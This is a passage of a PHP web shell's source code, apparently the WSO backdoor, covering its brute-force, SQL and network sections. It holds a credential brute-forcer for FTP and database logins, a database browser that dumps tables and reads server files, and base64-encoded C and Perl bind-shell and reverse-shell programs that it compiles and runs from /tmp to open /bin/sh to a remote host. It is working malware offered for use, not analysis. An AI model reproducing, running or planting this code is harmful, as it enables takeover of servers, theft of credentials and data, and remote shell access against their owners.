1189 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1190 $success++;
1191 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1192 }
1193 }
1194 }
1195 } elseif($_POST['type'] == 2) {
1196 $temp = @file($_POST['dict']);
1197 if( is_array($temp) )
1198 foreach($temp as $line) {
1199 $line = trim($line);
1200 ++$attempts;
1201 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1202 $success++;
1203 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1204 }
1205 }
1206 }
1207 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1208 }
1209 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1210 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1211 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1212 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1213 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1214 .'<input type=hidden name=ne value="">'
1215 .'<span>Server:port</span></td>'
1216 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1217 .'<tr><td><span>Brute type</span></td>'
1218 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1219 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1220 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1221 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1222 .'<td><input type=text name=login value="root"></td></tr>'
1223 .'<tr><td><span>Dictionary</span></td>'
1224 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1225 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1226 echo '</div><br>';
1227 hardFooter();
1228}
1229function actionSql() {
1230 class DbClass {
1231 var $type;
1232 var $link;
1233 var $res;
1234 function DbClass($type) {
1235 $this->type = $type;
1236 }
1237 function connect($host, $user, $pass, $dbname){
1238 switch($this->type) {
1239 case 'mysql':
1240 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1241 break;
1242 case 'pgsql':
1243 $host = explode(':', $host);
1244 if(!$host[1]) $host[1]=5432;
1245 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1246 break;
1247 }
1248 return false;
1249 }
1250 function selectdb($db) {
1251 switch($this->type) {
1252 case 'mysql':
1253 if (@mysql_select_db($db))return true;
1254 break;
1255 }
1256 return false;
1257 }
1258 function query($str) {
1259 switch($this->type) {
1260 case 'mysql':
1261 return $this->res = @mysql_query($str);
1262 break;
1263 case 'pgsql':
1264 return $this->res = @pg_query($this->link,$str);
1265 break;
1266 }
1267 return false;
1268 }
1269 function fetch() {
1270 $res = func_num_args()?func_get_arg(0):$this->res;
1271 switch($this->type) {
1272 case 'mysql':
1273 return @mysql_fetch_assoc($res);
1274 break;
1275 case 'pgsql':
1276 return @pg_fetch_assoc($res);
1277 break;
1278 }
1279 return false;
1280 }
1281 function listDbs() {
1282 switch($this->type) {
1283 case 'mysql':
1284 return $this->query("SHOW databases");
1285 break;
1286 case 'pgsql':
1287 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1288 break;
1289 }
1290 return false;
1291 }
1292 function listTables() {
1293 switch($this->type) {
1294 case 'mysql':
1295 return $this->res = $this->query('SHOW TABLES');
1296 break;
1297 case 'pgsql':
1298 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1299 break;
1300 }
1301 return false;
1302 }
1303 function error() {
1304 switch($this->type) {
1305 case 'mysql':
1306 return @mysql_error();
1307 break;
1308 case 'pgsql':
1309 return @pg_last_error();
1310 break;
1311 }
1312 return false;
1313 }
1314 function setCharset($str) {
1315 switch($this->type) {
1316 case 'mysql':
1317 if(function_exists('mysql_set_charset'))
1318 return @mysql_set_charset($str, $this->link);
1319 else
1320 $this->query('SET CHARSET '.$str);
1321 break;
1322 case 'pgsql':
1323 return @pg_set_client_encoding($this->link, $str);
1324 break;
1325 }
1326 return false;
1327 }
1328 function loadFile($str) {
1329 switch($this->type) {
1330 case 'mysql':
1331 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1332 break;
1333 case 'pgsql':
1334 $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
1335 $r=array();
1336 while($i=$this->fetch())
1337 $r[] = $i['file'];
1338 $this->query('drop table hard2');
1339 return array('file'=>implode("\n",$r));
1340 break;
1341 }
1342 return false;
1343 }
1344 function dump($table, $fp = false) {
1345 switch($this->type) {
1346 case 'mysql':
1347 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1348 $create = mysql_fetch_array($res);
1349 $sql = $create[1].";\n";
1350 if($fp) fwrite($fp, $sql); else echo($sql);
1351 $this->query('SELECT * FROM `'.$table.'`');
1352 $i = 0;
1353 $head = true;
1354 while($▟ = $this->fetch()) {
1355 $sql = '';
1356 if($i % 1000 == 0) {
1357 $head = true;
1358 $sql = ";\n\n";
1359 }
1360 $columns = array();
1361 foreach($▟ as $k=>$v) {
1362 if($v === null)
1363 $▟[$k] = "NULL";
1364 elseif(is_int($v))
1365 $▟[$k] = $v;
1366 else
1367 $▟[$k] = "'".@mysql_real_escape_string($v)."'";
1368 $columns[] = "`".$k."`";
1369 }
1370 if($head) {
1371 $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $▟).')';
1372 $head = false;
1373 } else
1374 $sql .= "\n\t,(".implode(", ", $▟).')';
1375 if($fp) fwrite($fp, $sql); else echo($sql);
1376 $i++;
1377 }
1378 if(!$head)
1379 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1380 break;
1381 case 'pgsql':
1382 $this->query('SELECT * FROM '.$table);
1383 while($▟ = $this->fetch()) {
1384 $columns = array();
1385 foreach($▟ as $k=>$v) {
1386 $▟[$k] = "'".addslashes($v)."'";
1387 $columns[] = $k;
1388 }
1389 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $▟).');'."\n";
1390 if($fp) fwrite($fp, $sql); else echo($sql);
1391 }
1392 break;
1393 }
1394 return false;
1395 }
1396 };
1397 $db = new DbClass($_POST['type']);
1398 if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
1399 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1400 $db->selectdb($_POST['sql_base']);
1401 switch($_POST['charset']) {
1402 case "Windows-1251": $db->setCharset('cp1251'); break;
1403 case "UTF-8": $db->setCharset('utf8'); break;
1404 case "KOI8-R": $db->setCharset('koi8r'); break;
1405 case "KOI8-U": $db->setCharset('koi8u'); break;
1406 case "cp866": $db->setCharset('cp866'); break;
1407 }
1408 if(empty($_POST['file'])) {
1409 ob_start("ob_gzhandler", 4096);
1410 header("Content-Disposition: attachment; filename=dump.sql");
1411 header("Content-Type: text/plain");
1412 foreach($_POST['tbl'] as $v)
1413 $db->dump($v);
1414 exit;
1415 } elseif($fp = @fopen($_POST['file'], 'w')) {
1416 foreach($_POST['tbl'] as $v)
1417 $db->dump($v, $fp);
1418 fclose($fp);
1419 unset($_POST['p2']);
1420 } else
1421 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1422 }
1423 hardHeader();
1424 echo "
1425<h1>Sql browser</h1><div class=content>
1426<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1427<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1428<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1429<td><select name='type'><option value='mysql' ";
1430 if(@$_POST['type']=='mysql')echo 'selected';
1431echo ">MySql</option><option value='pgsql' ";
1432if(@$_POST['type']=='pgsql')echo 'selected';
1433echo ">PostgreSql</option></select></td>
1434<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
1435<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
1436<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
1437 $tmp = "<input type=text name=sql_base value=''>";
1438 if(isset($_POST['sql_host'])){
1439 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1440 switch($_POST['charset']) {
1441 case "Windows-1251": $db->setCharset('cp1251'); break;
1442 case "UTF-8": $db->setCharset('utf8'); break;
1443 case "KOI8-R": $db->setCharset('koi8r'); break;
1444 case "KOI8-U": $db->setCharset('koi8u'); break;
1445 case "cp866": $db->setCharset('cp866'); break;
1446 }
1447 $db->listDbs();
1448 echo "<select name=sql_base><option value=''></option>";
1449 while($▟ = $db->fetch()) {
1450 list($key, $value) = each($▟);
1451 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1452 }
1453 echo '</select>';
1454 }
1455 else echo $tmp;
1456 }else
1457 echo $tmp;
1458 echo "</td>
1459 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1460 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1461 </tr>
1462 </table>
1463 <script>
1464 s_db='".@addslashes($_POST['sql_base'])."';
1465 function fs(f) {
1466 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1467 if(f.p1) f.p1.value='';
1468 if(f.p2) f.p2.value='';
1469 if(f.p3) f.p3.value='';
1470 }
1471 }
1472 function st(t,l) {
1473 d.sf.p1.value = 'select';
1474 d.sf.p2.value = t;
1475 if(l && d.sf.p3) d.sf.p3.value = l;
1476 d.sf.submit();
1477 }
1478 function is() {
1479 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1480 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1481 }
1482 </script>";
1483 if(isset($db) && $db->link){
1484 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1485 if(!empty($_POST['sql_base'])){
1486 $db->selectdb($_POST['sql_base']);
1487 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1488 $tbls_res = $db->listTables();
1489 while($▟ = $db->fetch($tbls_res)) {
1490 list($key, $value) = each($▟);
1491 if(!empty($_POST['sql_count']))
1492 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1493 $value = htmlspecialchars($value);
1494 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
1495 }
1496 echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1497 if(@$_POST['p1'] == 'select') {
1498 $_POST['p1'] = 'query';
1499 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1500 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1501 $num = $db->fetch();
1502 $pages = ceil($num['n'] / 30);
1503 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1504 echo " of $pages";
1505 if($_POST['p3'] > 1)
1506 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1507 if($_POST['p3'] < $pages)
1508 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1509 $_POST['p3']--;
1510 if($_POST['type']=='pgsql')
1511 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1512 else
1513 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1514 echo "<br><br>";
1515 }
1516 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1517 $db->query(@$_POST['p2']);
1518 if($db->res !== false) {
1519 $title = false;
1520 echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
1521 $line = 1;
1522 while($▟ = $db->fetch()) {
1523 if(!$title) {
1524 echo '<tr>';
1525 foreach($▟ as $key => $value)
1526 echo '<th>'.$key.'</th>';
1527 reset($▟);
1528 $title=true;
1529 echo '</tr><tr>';
1530 $line = 2;
1531 }
1532 echo '<tr class="l'.$line.'">';
1533 $line = $line==1?2:1;
1534 foreach($▟ as $key => $value) {
1535 if($value == null)
1536 echo '<td><i>null</i></td>';
1537 else
1538 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1539 }
1540 echo '</tr>';
1541 }
1542 echo '</table>';
1543 } else {
1544 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1545 }
1546 }
1547 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1548 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1549 echo htmlspecialchars($_POST['p2']);
1550 echo "</textarea><br/><input type=submit value='Execute'>";
1551 echo "</td></tr>";
1552 }
1553 echo "</table></form><br/>";
1554 if($_POST['type']=='mysql') {
1555 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1556 if($db->fetch())
1557 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1558 }
1559 if(@$_POST['p1'] == 'loadfile') {
1560 $file = $db->loadFile($_POST['p2']);
1561 echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1562 }
1563 } else {
1564 echo htmlspecialchars($db->error());
1565 }
1566 echo '</div>';
1567 hardFooter();
1568}
1569function actionNetwork() {
1570 hardHeader();
1571 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1572 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1573 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1574 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1575 echo "<h1>Network tools</h1><div class=content>
1576 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
1577 <span>Bind port to /bin/sh</span><br/>
1578 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
1579 </form>
1580 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
1581 <span>Back-connect to</span><br/>
1582 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
1583 </form><br>";
1584 if(isset($_POST['p1'])) {
1585 function cf($f,$t) {
1586 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1587 if($w) {
1588 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1589 @fclose($w);
1590 }
1591 }
1592 if($_POST['p1'] == 'bpc') {
1593 cf("/tmp/bp.c",$bind_port_c);
1594 $▖ = ex("gcc -o /tmp/bp /tmp/bp.c");
1595 @unlink("/tmp/bp.c");
1596 $▖ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1597 echo "<pre class=ml1>$▖".ex("ps aux | grep bp")."</pre>";
1598 }
1599 if($_POST['p1'] == 'bpp') {
1600 cf("/tmp/bp.pl",$bind_port_p);
1601 $▖ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1602 echo "<pre class=ml1>$▖".ex("ps aux | grep bp.pl")."</pre>";
1603 }
1604 if($_POST['p1'] == 'bcc') {
1605 cf("/tmp/bc.c",$back_connect_c);
1606 $▖ = ex("gcc -o /tmp/bc /tmp/bc.c");
1607 @unlink("/tmp/bc.c");
1608 $▖ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1609 echo "<pre class=ml1>$▖".ex("ps aux | grep bc")."</pre>";
1610 }
1611 if($_POST['p1'] == 'bcp') {
1612 cf("/tmp/bc.pl",$back_connect_p);
1613 $▖ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1614 echo "<pre class=ml1>$▖".ex("ps aux | grep bc.pl")."</pre>";
1615 }
1616 }
1617 echo '</div>';
1618 hardFooter();
1619}
1620if( empty($_POST['a']) )
1621 if(isset($▚) && function_exists('action' . $▚))
1622 $_POST['a'] = $▚;
1623 else
1624 $_POST['a'] = 'FilesMan';
1625if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1626 call_user_func('action' . $_POST['a']);
1627?>